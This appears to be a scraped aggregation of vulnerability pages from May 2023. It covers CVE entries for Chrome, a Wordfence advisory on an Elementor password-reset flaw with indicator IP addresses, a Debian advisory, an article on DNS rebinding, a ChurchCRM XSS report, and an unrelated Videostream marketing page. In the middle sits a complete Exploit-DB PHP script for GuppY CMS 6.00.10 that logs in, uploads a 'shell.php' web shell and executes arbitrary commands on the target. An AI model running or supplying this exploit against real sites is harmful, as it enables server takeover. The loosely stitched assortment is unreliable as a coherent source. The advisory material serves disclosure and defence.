**Why is this Chrome CVE included in the Security Update Guide?**

The vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable. Please see Security Update Guide Supports CVEs Assigned by Industry Partners for more information.

**How can I see the version of the browser?**

1.  In your Microsoft Edge browser, click on the 3 dots (...) on the very right-hand side of the window
2.  Click on **Help and Feedback**
3.  Click on **About Microsoft Edge**

CVE-ID

Learn more at National Vulnerability Database (NVD)

• CVSS Severity Rating • Fix Information • Vulnerable Software Versions • SCAP Mappings • CPE Information

Description

Use after free in Navigation in Google Chrome prior to 113.0.5672.126 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Critical)

References

**Note:** References are provided for the convenience of the reader to help distinguish between vulnerabilities. The list is not intended to be complete.

*   DEBIAN:DSA-5404
*   URL:https://www.debian.org/security/2023/dsa-5404
*   MISC:https://chromereleases.googleblog.com/2023/05/stable-channel-update-for-desktop\_16.html
*   URL:https://chromereleases.googleblog.com/2023/05/stable-channel-update-for-desktop\_16.html
*   MISC:https://crbug.com/1444360
*   URL:https://crbug.com/1444360

Assigning CNA

Chrome

Date Record Created

**20230515**

Disclaimer: The record creation date may reflect when the CVE ID was allocated or reserved, and does not necessarily indicate when this vulnerability was discovered, shared with the affected vendor, publicly disclosed, or updated in CVE.

Phase (Legacy)

Assigned (20230515)

Votes (Legacy)

Comments (Legacy)

Proposed (Legacy)

N/A

This is a record on the CVE List, which provides common identifiers for publicly known cybersecurity vulnerabilities.

Search CVE Using Keywords:  

You can also search by reference using the CVE Reference Maps.

For More Information:  CVE Request Web Form (select "Other" from dropdown)

CVE-2023-2721: Chromium: CVE-2023-2721 Use after free in Navigation

On May 11 2023, Essential Addons for Elementor, a WordPress plugin with over one million active installations, released a patch for a critical vulnerability that made it possible for any unauthenticated user to reset arbitrary user passwords, including user accounts with administrative-level access. Versions 5.7.1 and below are affected.

    Attackers are already exploiting the critical Authentication Bypass Vulnerability in Essential Addons for Elementor.On May 11 2023, Essential Addons for Elementor, a WordPress plugin with over one million active installations, released a patch for a critical vulnerability that made it possible for any unauthenticated user to reset arbitrary user passwords, including user accounts with administrative-level access. This vulnerability was discovered and responsibly disclosed by security researcher Rafie Muhammed.Over the past few days we’ve seen millions of probing attempts for the plugin’s readme.txt file, which are likely to be attackers probing for the presence of the plugin to build a target site exploit list, along with over 6,900 blocked exploit attempts. Our attack data is limited due to the fact that the rule only triggers if the plugin is installed on a site with a vulnerable version, but a programmatic exploit was made public on Github on May 14th. This is the type of vulnerability that tends to see widespread attacks due to a combination of a large install base, ease of exploitation, and severity of impact, and we anticipate that exploit attempts will only ramp up from here.Wordfence Premium, Care, and Response customers received a firewall rule the same day the issue was disclosed on May 11, 2023. Wordfence free users will receive that same protection 30 days later on June 20, 2023. Considering how easily this vulnerability can be successfully exploited, we highly recommend all users of the plugin update ASAP to ensure their site is not compromised by this vulnerability.This email content has also been published on our blog and you're welcome to post a comment there if you'd like to join the conversation. Or you can read the full post in this email.READ THIS POST ON THE BLOGVulnerability DetailsDescription: Essential Addons for Elementor <= 5.7.1 – Unauthenticated Arbitrary Password Reset to Privilege Escalation Affected Plugin: Essential Addons for Elementor Plugin Slug: essential-addons-for-elementor-liteAffected Versions: <= 5.7.1CVE ID: CVE-2023-32243CVSS Score: 9.8 (Critical)CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:HResearcher/s: Rafie Muhammed Fully Patched Version: 5.7.2The vulnerability patched in Essential Addons for Elementor allowed for attackers to reset passwords for arbitrary accounts on any of the one million WordPress sites running the plugin. This was due to the fact that the reset_password function did not adequately validate a password reset request with a password reset key, so attackers could simply supply a valid username, obtain a valid nonce from the site’s homepage, input random data for the remaining fields, and reset the supplied users password to whatever they chose in one simple request.WordPress doesn’t consider usernames to be sensitive information which means attackers can easily enumerate a site looking for valid usernames. Additionally, site owners often forget to change the default username making it possible for attackers to use common default usernames such as ‘admin.’ This makes it much easier for attackers to uncover valid accounts that they can compromise in order to elevate their privileges on the site. Once the attacker is logged in as an administrator, they have free rein to perform actions like installing plugins and backdoors to further infect the site, server, and any unsuspecting visitors.A Look at the Attack DataPlugin Discovery ProbingThe first interesting trend we noticed is that immediately following the disclosure of the vulnerability on May 11, 2023 readme.txt probing attempts for Essential Addons for Elementor immediately spiked and remained relatively higher than normal over the course of a few days. While there are services that probe installation data for legitimate purposes, we believe this data indicates that attackers began looking for vulnerable sites as soon as the vulnerability was disclosed. Over 5,000,000 readme.txt probs were made just the day after disclosure.readmeprob Top Offending IP Addresses Engaging in Discoveryreadmeprobip Top Offending IP Addresses And Total Number of Exploits BlockedIn the past 5 days, we have blocked over 6,900 attacks with the top attacking IP being 78.128.60.112. We have also detected and blocked a few hundred exploit attempts utilizing the exploit that was released two days ago. Again, our data is limited due to the nature of the WAF rule, however, it’s worth noting that all of the 6,900 requests we blocked would have likely led to site compromises if they did not have Wordfence Premium installed.exploitattempts Indicators of CompromiseOne obvious sign of infection is if a site’s administrator is unable to log in with the correct password as it may have been changed as a result of this vulnerability, and the site is running Essential Addons for Elementor version 5.7.1 or older. We also recommend checking for newly added malicious administrators, as these may have been added to maintain persistence.We have begun tracking infections on sites running a vulnerable version of the plugin, and though no clear pattern has yet emerged, sites running outdated versions of the plugin were already at significantly higher risk of infection than our average user.User Agents- The public exploit uses the following User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36 Edge/16.16299Look for requests in a site’s access log with the following originating IP Addresses:- 78.128.60.112- 23.224.195.51- 212.113.119.6- 193.233.232.243- 91.193.43.151- 51.77.200.137- 2a0e:d602:1:4c8::2- 103.187.5.198- 2a0e:d602:1:bae::2- 103.149.137.18ConclusionIn today’s article, we covered a Critical-severity vulnerability in Essential Addons for Elementor that allows attackers to easily take over websites by resetting the password of any user, including administrators. We have begun tracking attack data for this vulnerability and expect attacks to ramp up as the vulnerability is trivial to exploit, has a wide install base, and is highly impactful, making it incredibly attractive to attackers.Wordfence Premium, Care, and Response customers received protection against this vulnerability via a firewall rule on May 11, 2023, and Wordfence free users will receive the same protection 30 days later on June 20, 2023.Even if you have already received a firewall rule for this issue we urge you to ensure that your site is updated to at least version 5.7.2 in order to maintain normal functionality, as this vulnerability is severe. If you have friends or colleagues running Essential Addons for Elementor, be sure to forward this advisory to them, as hundreds of thousands of sites still remain unprotected and unpatched.If you believe your site has been compromised as a result of this vulnerability or any other vulnerability, we offer Incident Response services via Wordfence Care. If you need your site cleaned immediately, Wordfence Response offers the same service with 24/7/365 availability and a 1-hour response time. Both these products include hands-on support in case you need further assistance.If you are a security researcher, you can responsibly disclose your finds to us and obtain a CVE ID and get your name on the Wordfence Intelligence leaderboard. I’d like to say a special thank you to my colleague Ramuel Gall, Senior Security Researcher at Wordfence, for his assistance on this research and post.

WordPress Elementor Lite 5.7.1 Arbitrary Password Reset

AI-powered cyber defense service protects against phishing attacks for businesses on unlimited handset plans.

**SAN FRANCISCO****,** **May 17, 2023** **/PRNewswire/ --** ActZero®, a leading cybersecurity provider for small and mid-sized enterprises, announced it is teaming with UScellular, making it the first and only wireless carrier to offer the ActZero Managed Detection and Response (MDR) service. Together the two organizations make it easier for businesses to secure mobile devices from ransomware and phishing attacks. UScellular Business Ultimate and Business Premium unlimited handset plans now include ActZero MDR for Mobile.

"UScellular and ActZero share a common goal: to bring better performance and better security to businesses at a fair price," said Sameer Bhalotra, chief executive officer for ActZero. "With ActZero's on-device cyberdefense technology plus 24x7 security operations staff, UScellular business customers can stop mobile threats quickly, before they spread into the corporate network."

With 24/7 threat coverage, ActZero stops breaches on mobile devices and networks, with a 90% block rate and response time of 15 minutes for critical alerts. Customers can easily deploy ActZero MDR for Mobile within minutes to their employees' iOS, Android, or Chrome mobile phones, tablets, and laptops. On-device protection and real-time notifications eliminate delays if a mobile device is compromised. ActZero's patent-pending AI means better cyberdefense and fewer false alarms.

"ActZero delivers a powerful and affordable cybersecurity service businesses need to prioritize threat and vulnerability management," said Kim Kerr, senior vice president, enterprise sales and operations for UScellular. "Our customers often don't have the IT resources to ensure they are protecting their network and devices from malware, phishing, and ransomware attacks. The unique artificial intelligence and machine learning from ActZero intelligently pinpoints threats so less time is spent filtering noise and more time is focused on the action that should be taken, when it's truly important."

**About ActZero**

ActZero is a Gartner-recognized provider of Managed Detection and Response (MDR) services that delivers a powerful and affordable cybersecurity service to protect small and mid-sized enterprises against ransomware attacks. By continuously testing defenses against the latest attack techniques and variants, ActZero ensures AI detections and human threat hunters quickly stop threats. The company brings deep roots and expertise in cybersecurity to deliver measurable ransomware defense, reducing false alerts and responding quickly on a customer's behalf. Combined with exceptional service, ActZero empowers businesses with confidence that the company and customers are protected. For more information, please visit actzero.com.

**About UScellular Business** 

UScellular is the fourth-largest full-service wireless carrier in the United States, providing national network coverage and industry-leading innovations designed to elevate the customer experience. The Chicago\-based carrier provides a strong, reliable network supported by the latest technology and plays a critical role in helping businesses of all sizes navigate the wireless ecosystem, delivering advanced technology, increased network security and reliability. To learn more about UScellular's business solutions, visit one of its retail stores or uscellular.com/business.

ActZero Teams Up With UScellular to Secure Mobile Devices From Ransomware Attacks

Debian Linux Security Advisory 5404-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5404-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffMay 17, 2023                          https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2023-2721 CVE-2023-2722 CVE-2023-2723 CVE-2023-2724                 CVE-2023-2725 CVE-2023-2726Multiple security issues were discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure.For the stable distribution (bullseye), these problems have been fixed inversion 113.0.5672.126-1~deb11u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmRlPBIACgkQEMKTtsN8TjaiVg//ffwOJFoQSb/NWsCnX3O5gJc7a+t2fRhwgv8m7fbC5VkxLx8XWPDxV+QrWXkHhGFNdsEIiZ4QNuJHyyz39T824JVAqe0lqOSEHFy1+3RjLiVkZ7zZXN+IQ2VKmdwls+xlSneo1Sv4f4l6yXwTe5xVaqiL9pLDCkL82+cgB1Ut4s8v6gW7B2Vu4HLnuTnsYfOdQmSLOxJ5lFTAsMbpq1TxogZzXK2psrNOh2mHeUkv5V5HaZKuKpOh9vmMaGjKeP+yrii5UDeQCyZYKERIBqQ+PcqEFo1OM0NiWr3WeyBp527Mdw7bZ7VnmH/GmPB3zLoVV/ilEO2/+QwEThom5AAePILrNPX631IMPAt9JMtljtO5Ojl3xMUau060f5zlo+C+ewP8/ZT4d90i18IVhFHyy3309npgSuPyf1o/ofaH9H2NE3bBofN/ySAd5ar7+gYjt97Miuk/tSIm/DU1Q/xWoqo81yEWYqSwfysTOA3Fav+4g0bnfdsWf8QxCBMOvpFphFXx9UMLBc7B9KfLqOdt2YZttAD93RgVggms79DYD/NQE8HixgB4jPIZv6rTQIhuNLloPAelCNK9uUlx/6qdJMKEyoh+W6zLYeZ7QW2oPsDPDO346yCogX48BXTWGEY23JC7+LfEULa27yNVQ9J1c/Okog65iK6kRWQ0whsuN3c=BoPs-----END PGP SIGNATURE-----

Debian Security Advisory 5404-1

DNS rebinding attacks are not often seen in the wild, which is one reason why browser makers have taken a slower approach to adopting the web security standard.

Browser companies and network-security vendors have created a variety of defenses for the three-decades-old attack technique known as DNS rebinding, but protection remains spotty due to uneven acceptance and updated exploitation techniques.

DNS rebinding — which allows external malicious sites visited by an unsuspecting victim to access internal servers and services —is similar to cross-site request forgery, where an attacker can use a JavaScript component or Java applet to request resources from another site or network. DNS rebinding typically works by attracting a user to a malicious website and using the site's content and a short time-to-live (TTL) to force the browser to send a new domain name system (DNS) request, to which the attacker's site responds with an internal network IP address. The attack essentially allows an attacker to use a victim's browser to send requests to servers and devices on the internal network.

The attack, however, can be made harder to execute with a variety of defenses, including enforcing the Same-Origin Policy by pinning the domain name in the browser, looking for anomalous requests through the targeted user's DNS service, and adopting Local Network Access, a proposed Web security standard by the World Wide Web Consortium (W3C) that blocks DNS-based attacks. While these defenses work to make DNS rebinding attacks more difficult, they can be bypassed under some circumstances, NCC Group said in a recent report.

Because DNS rebinding exposes the attack surfaces of internal Web applications to malicious websites, the attack could be useful against enterprise targets as a way to gain access to credential data and resources hosted on internal networks, says Zhanhao Chen, a principal researcher for network security at Palo Alto Networks.

"In the real world, the attacker can build a website with a DNS rebinding script and trick the victim to open it in their browser," he says. "Once the malicious website is open on an employee's browser, the attacker can manipulate or steal information from internal Web applications that are vulnerable."

**DNS Rebinding Attacks Face Difficult Defenses**

Every browser does some form of DNS pinning, preventing the assigning of new network addresses for a specific website or host name for a certain time period, such as an hour. DNS-based security services, such as Cisco's Umbrella, also prevent anomalous changes in DNS data using suspicious response filters, which identify potential attacks and stop them.

The W3C's Local Network Access spec, previously called "Private Network Access," places a barriers between global, local, and internal addresses, such as the loopback address for the local host, and forces services to gain permission to explicitly access the local network.

In the latest analysis published by NCC Group, however, Roger Meyer, a technical director at NCC Group, argues that the defenses still are not complete. Using the 0.0.0.0 address, which can access Linux and Mac OS systems' internal IP address, for example, bypasses the current Local Network Access protections, Meyer says.

"Usually, that specific 0.0.0.0 IP address is non-routable and should not work as an IP address. You should not be able to even use it for accessing anything, but it just works on Mac OS and Linux devices," he says.

NCC Group opened up a bug report with Google, an early adopter of the Local Network Access specification, to get the issue fixed in the Chromium codebase, Meyer says.

**Bolstering Defenses**

DNS rebinding attacks are not often seen in the wild, which is one reason why browser makers have taken a slower approach to mitigating the issue. Another is that companies do not want to break internal applications, whose developers may rely on the ability to handle cross-origin requests.

If Web application developers adopt the HTTPS encrypted Web protocols as a general rule, they can prevent their applications from being used in a DNS rebinding attack, says Palo Alto Networks' Chen.

"This kind of mitigation depends on the developer of internal services, \[so\] it is not scalable," he says. "As third-party Web applications populate in both home and enterprise environments, it's more difficult for the network owners to identify and fix all potentially vulnerable servers."

While DNS rebinding is not as common as other widely spread threats, such as DNS tunneling, domain-generation algorithms, DNS amplification denial-of-service attacks, and DNS hijacking, many Web applications remain vulnerable to DNS rebinding, and attackers are actively exploiting it, Chen says. Palo Alto Networks noted that seven DNS-binding-related CVEs were released in 2021 and nine in 2022, and the company continues to see attack traffic in the wild.

Companies can help bolster their defenses by using DNS services that detect attacks and help remote employees protect their at-home environments. Because an attacker needs to either know information about the victim's environment or know they are using common devices or applications, those common services should be hardened against attack, NCC Group's Meyer says.

"There are ways to discover if there are vulnerable services on the network or on employee devices, so the company could scan the network to find those vulnerable services," he says. "There are intrusion detection systems or other kinds of security software that can look for services listening on developer machines or any other employees' systems, and any services that are listening on a localhost are potentially vulnerable to DNS rebinding."

Rebinding Attacks Persist With Spotty Browser Defenses

ChurchCRM v4.5.4 is vulnerable to Reflected Cross-Site Scripting (XSS) via image file.

**If you have the ChurchCRM software running, please file an issue using the _Report an issue_ in the help menu.**

**On what page in the application did you find this issue?**

I got issue CSVImport.php page.

**On what type of server is this running? Dedicated / Shared hosting? Linux / Windows?**

Windows Server

**What browser (and version) are you running?**

Brave browser \[Version 1.50.119 Chromium: 112.0.5615.121\]

**What version of PHP is the server running?**

7.4.29

**What version of SQL Server are you running?**

Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29

**What version of ChurchCRM are you running?**

v4.5.4

**Description:**  
I found Cross site scripting (XSS) vulnerability in your ChurchCRM (v4.5.4) "Admin" menu to CSV Import page there Import data CSV uploader option. When I upload image file there malicious code inserted in image then the browser give me result. Because a browser can not know if the script should be trusted or not.

**CMS Version:**  
v4.5.4

**Affected URL:**  
http://127.0.0.1/churchcrm/CSVImport.php

**Steps to Reproduce:**

1.  First login your admin panel.
2.  Then click "Admin" menu and click "CSV Import" and you will get CSV file uploder option.

3.  now insert xss payload in jpg file using exiftool or from image properties.

4.  after then upload the jpg file.
5.  you will see XSS pop up.

**Proof of Concept:**  
You can see the Proof of Concept. Which I've attached screenshots and video to confirm the vulnerability.

poc.mp4

**Impact:**  
Attackers can make use of this to conduct attacks like phishing, steal sessions etc.

Let me know if any further info is required.

Thanks & Regards  
**Rahad Chowdhury**  
Cyber Security Specialist  
https://www.linkedin.com/in/rahadchowdhury/

CVE-2023-31699: XSS via Image File · Issue #6471 · ChurchCRM/CRM

GuppY CMS 6.00.10 is vulnerable to Unrestricted File Upload which allows remote attackers to execute arbitrary code by uploading a php file.

**GuppY CMS v6.00.10 - Remote Code Execution**

**Platform:****PHP**

**Date:****2023-03-25**

  

    # Exploit Title: GuppY CMS v6.00.10 - Remote Code Execution
    # Date: Sep 30, 2022
    # Exploit Author: Chokri Hammedi
    # Vendor Homepage: https://www.freeguppy.org/
    # Software Link:
    https://www.freeguppy.org/fgy6dn.php?lng=en&pg=279927&tconfig=0#z2
    # Version: 6.00.10
    # Tested on: Linux
    
    #!/usr/bin/php
    
    <?php
    
    $username = "Admin2"; //Administrator username
    $password = "rose1337"; //Administrator password
    
    
    $options = getopt('u:c:');
    
    if(!isset($options['u'], $options['c']))
    die("\n GuppY 6.00.10 CMS Remote Code Execution \n Author: Chokri Hammedi
    \n \n Usage : php exploit.php -u http://target.org/ -c whoami\n\n
    
    \n");
    
    $target     =  $options['u'];
    
    $command    =  $options['c'];
    
    // Administrator login
    
    $cookie="cookie.txt";
    $url = "{$target}guppy/connect.php";
    
    $postdata = "connect=on&uuser=old&pseudo=".$username."&uid=".$password;
    $curlObj = curl_init();
    
    curl_setopt($curlObj, CURLOPT_URL, $url);
    curl_setopt($curlObj, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($curlObj, CURLOPT_HEADER, 1);
    curl_setopt($curlObj, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt ($curlObj, CURLOPT_POSTFIELDS, $postdata);
    curl_setopt ($curlObj, CURLOPT_POST, 1);
    CURL_setopt($curlObj,CURLOPT_RETURNTRANSFER,True);
    CURL_setopt($curlObj,CURLOPT_FOLLOWLOCATION,True);
    CURL_SETOPT($curlObj,CURLOPT_CONNECTTIMEOUT,30);
    CURL_SETOPT($curlObj,CURLOPT_TIMEOUT,30);
    curl_setopt($curlObj,CURLOPT_COOKIEFILE, "$cookie");
    curl_setopt($curlObj, CURLOPT_COOKIEJAR, "$cookie");
    $result = curl_exec($curlObj);
    
    
    // uploading shell
    
    $url2 = "{$target}guppy/admin/admin.php?lng=en&pg=upload";
    
    $post='------WebKitFormBoundarygA1APFcUlkIaWal4
    Content-Disposition: form-data; name="rep"
    
    file
    ------WebKitFormBoundarygA1APFcUlkIaWal4
    Content-Disposition: form-data; name="ficup"; filename="shell.php"
    Content-Type: application/x-php
    
    <?php system($_GET["cmd"]); ?>
    
    ------WebKitFormBoundarygA1APFcUlkIaWal4--
    ';
    
    $headers = array(
    
    
                'Content-Type: multipart/form-data;
    boundary=----WebKitFormBoundarygA1APFcUlkIaWal4',
                'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
    AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.114 Safari/537.36',
    
                'Accept-Encoding: gzip, deflate',
                'Accept-Language: en-US,en;q=0.9'
    );
    curl_setopt($curlObj, CURLOPT_HTTPHEADER, $headers);
    curl_setopt($curlObj, CURLOPT_URL, $url2);
    curl_setopt($curlObj, CURLOPT_POSTFIELDS, $post);
    curl_setopt($curlObj, CURLOPT_POST, true);
    curl_setopt($curlObj, CURLOPT_SSL_VERIFYPEER, false);
    CURL_setopt($curlObj,CURLOPT_RETURNTRANSFER,True);
    CURL_setopt($curlObj,CURLOPT_FOLLOWLOCATION,True);
    CURL_SETOPT($curlObj,CURLOPT_CONNECTTIMEOUT,30);
    CURL_SETOPT($curlObj,CURLOPT_TIMEOUT,30);
    curl_setopt($curlObj,CURLOPT_COOKIEFILE, "$cookie");
    curl_setopt($curlObj, CURLOPT_COOKIEJAR, "$cookie");
    
    $data = curl_exec($curlObj);
    
    
    // Executing the shell
    
    
    $shell = "{$target}guppy/file/shell.php?cmd=" .$command;
    curl_setopt($curlObj, CURLOPT_URL, $shell);
    curl_setopt($curlObj, CURLOPT_HTTPHEADER, array('Content-Type:
    application/x-www-form-urlencoded'));
    curl_setopt($curlObj, CURLOPT_SSL_VERIFYPEER, False);
    CURL_setopt($curlObj,CURLOPT_RETURNTRANSFER,True);
    curl_setopt($curlObj, CURLOPT_HEADER, False);
    curl_setopt($curlObj, CURLOPT_POST, false);
    
    $exec_shell = curl_exec($curlObj);
    
    $code = curl_getinfo($curlObj, CURLINFO_HTTP_CODE);
    
    if($code != 200) {
        echo "\n\n \e[5m\033[31m[-]Something went wrong! \n [-]Please check the
    credentials\n";
    }
    else {
    
    print("\n");
    print($exec_shell);
    
    }
    curl_close($curlObj);
    
    ?>

CVE-2023-31903: OffSec’s Exploit Database Archive

The MoroSystems EasyMind - Mind Maps plugin before 2.15.0 for Confluence allows persistent XSS when saving a Mind Map with the hyperlink parameter.

CVE-2023-30452: EasyMind - Mind Maps for Confluence - Version history

Videostream macOS app 0.5.0 and 0.4.3 has a Race Condition. The Updater privileged script attempts to update Videostream every 5 hours.

**Downloaded videos on your Chromecast. Instantly.****The easiest way to stream

videos MP4s MKVs AVIs WMVs MP3s

from your computer to Chromecast or AndroidTV.  
Control it all from Android or iOS.**

  

Brooklyn Nine Nine © 2013-2015 Fremulon, Dr. Goor Productions (PG)

play\_arrow

No setup. Seriously.  
**Just start watching.**

event\_seat

**Relax with Mobile Apps**

Play, pause, & seek from your couch with **free** Android and iOS remotes.

**Play MKVs, AVIs, MP4s, MP3s...**

Videostream supports over 400 video and audio codecs out of the box.  
This means you can **play almost any video on your Chromecast!**

**...with no setup**

There's no pesky library setup or servers to install.  
There's no accounts to create or codecs to download.  
**Just choose a video and ...no really, that's it!**  
Start watching any video on your Chromecast in seconds, Install the Desktop App now!

Frozen © 2013 Walt Disney Animation Studios (G)

Suits © 2011-2015 Universal Cable (TV-14)

**Playlists, Subtitles, & Rainbows,  
Premium is Awesome.**

done

**Playlists:** Binge watch your favourite shows using playlists in Chrome

done

**Subtitles:** Get extra settings to change subtitle size and color

done

**Notifications:** Notifications on Android when your downloads finish

done

**Love:** Support (and feed!) our team of 7 developers in Canada! <3

**Start watching downloads on your Chromecast!**

**"It's the perfect app to stream your media to your Chromecasts"**

"No fiddling about with extra services, just find the file you want and have it play in the big screen." - Gizmodo

**It transformed my Chromecast from a Netflix and YouTube machine to a watch-whatever-I-want-machine. Which is great!**

\- Shonda, Videostream User

**Let me start by saying that I recently bought the lifetime premium membership and I absolutely love Videostream. It is my favorite thing in the world after pizza and Coca-Cola.**

\- Aldo, Videostream Premium User

**I have a very large movie collection on a networked drive, and it never fails to load the movies, cast them, load subtitles, etc. It's a piece of technology and media genius, so thank you all.**

\- Eliza, Videostream User

**I just wanted to say how much I love Videostream. I use it almost every day. Now that I can select files right from my phone, it is a completely hassle free experience.**

\- Rezaan, Videostream User

**People love Videostream. Try it yourself for free!  
**

**7 developers in Canada eh!?**

Just bunch of Canucks coding for the love of perfect streaming video <3

**Frequently Asked Questions**

Got questions? We have answers (if your answer isn't below, email us!)

**Do you play \_\_\_ files? (MKV, MP4, AVI, WMV...)**

Yup!! Videostream supports over 400 audio and video codecs so with almost complete certainty, yes.

**How much does it cost?**

Nothing, zip, zilch, nada, Videostream is completely free! If you're enjoying Videostream and want some extra features like playlists, extra subtitle settings, night mode, autoplay, and more, then Videostream Premium is for you!

**I have slow internet, will Videostream work?**

You bet! Since you are streaming video from your computer directly to your Chromecast or AndroidTV, Videostream doesn't use any of your internet bandwidth! That means no extra usage on your bill, no slowed down traffic on other devices.

**How do I setup Videostream?**

It's super simple! Open Google Chrome and then install Videostream. If you have an iPhone or Android phone you can check out our remote controls on those apps stores too!

**Does Videostream have playlists?!**

Is maple syrup sweet?! You bet! Playlists let you binge watch movies, tv shows, and even listen to music on your Chromecast. You can even shuffle or repeat your playlist! Grab your playlists in Videostream Premium, download and upgrade in the Desktop or Android App today!

**What if I have another question?**

Email us at \[email protected\]! Our awesome support bro Andrew will be sure to email you back with answers to your questions, solutions to your problems, and a random selection of cat pictures and gifs!

**Come on, it's what you bought your Chromecast for!**

CVE-2023-25394: What you bought your Chromecast for.

Use after free in DevTools in Google Chrome prior to 113.0.5672.126 allowed a remote attacker who had compromised the renderer process to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

Tag

#chrome